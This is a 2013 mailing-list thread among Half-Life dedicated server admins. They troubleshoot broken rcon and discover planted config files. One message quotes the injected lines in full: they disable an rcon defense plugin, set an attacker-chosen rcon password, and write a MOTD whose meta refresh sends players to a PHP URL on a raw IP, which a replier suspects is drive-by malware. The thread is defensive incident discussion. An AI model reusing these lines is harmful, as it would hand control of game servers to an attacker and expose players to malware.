It's pretty much certain that he's got an AMX plugin with a security hole in it.
On Thu, Jan 3, 2013 at 8:10 AM, Bjorn Wielens <[email protected]> wrote: > Interesting. I was under the impression that RCON can't make permanent > server config changes (i.e. write to config files) - I thought it was only > limited to being able to change current cvars in memory, which would be > wiped the next time a config changes them. > > Have I got that wrong? > > If not, I'd suspect the attack vector is probably not via RCON... more > likely an exploit via a file upload mechanism or so (sprays?) to get the > malicious .cfg there in the first place. > Sadly the redirected URL doesn't respond for me, so I can't take a look > and see what they were attempting to do with it. (more than likely a > drive-by malware install or something). > > > > > > > ________________________________ > From: Collin Howard <[email protected]> > To: Half-Life dedicated Linux server mailing list < > [email protected]> > Sent: Wednesday, January 2, 2013 3:23:33 PM > Subject: Re: [hlds_linux] Remote connection with rcon > > Looks like there might be a new exploit or hack. Somehow, someone was able > to create a maps folder in my amxmodx config folder and create map specific > cfg files and added the following lines to it: > > amxx pause rcon_defencer.amxx > rcon_password "56425642" > motdfile motd.txt > motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL= > http://78.110.63.117//abunaimo.php?jecttely=674660";> > > I dont use ftp on the box, only access to the box is via ssh and the ssh > port is a completely random port and the password is 25+ character > completely random password. So I dont think anyone could have gained access > to the box directly to do this. Is there a known exploit or hack that does > this? This was done with only one HLDS setup on the box while the other > HLDS setups were not effected. These files are what were causing my issue > of not being able to remotely connect with the rcon specified in server.cfg > > > > ________________________________ > From: Ken Bateman <[email protected]> > To: Collin Howard <[email protected]>; Half-Life dedicated Linux server > mailing list <[email protected]> > Sent: Tuesday, January 1, 2013 1:43:32 AM > Subject: Re: [hlds_linux] Remote connection with rcon > > > > > > On Tue, Jan 1, 2013 at 1:15 AM, Collin Howard <[email protected]> wrote: > > From the looks of it, server.cfg is not automatically executing when the > map changes and even when I restart the hlds. Anyone have a clue on whats > going on? Doing exec server.cfg in console executed the config file and > rcon started working. Any ideas? > > > > Is servercfgfile set to "server.cfg"? Is it being set to something > different on the command line or in autoexec.cfg? > > -Ken > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
